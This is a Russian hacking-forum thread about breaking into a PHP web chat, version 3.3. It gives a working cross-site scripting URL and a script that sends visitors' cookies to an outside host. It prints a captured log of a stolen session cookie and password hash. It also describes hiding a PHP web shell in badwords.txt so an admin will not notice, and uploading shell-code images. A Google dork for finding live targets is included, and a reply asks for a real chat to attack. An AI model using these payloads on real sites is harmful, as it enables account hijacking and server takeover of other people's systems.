решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script> s.js PHP: img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; PHP: REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3 AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1) + с правами админа можно сдампить БД юзеров, при наличии локального инклуда на сайте в badwords.txt можно безпалевно вписать PHP: <?php system($_GET[cmd]); ?> - админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом. гугл inurl:"info.php?reason=link"
Отлично поработал Если есть чат на примете, в онлайне, кинь ссылку. А то через денвер в лом искать. Буду пробовать ещё что то сделать
Определение версии чата в самом низу гугл inurl:"info.php?reason=link" Определение версии чата - _http://www.host.ru/chat/version
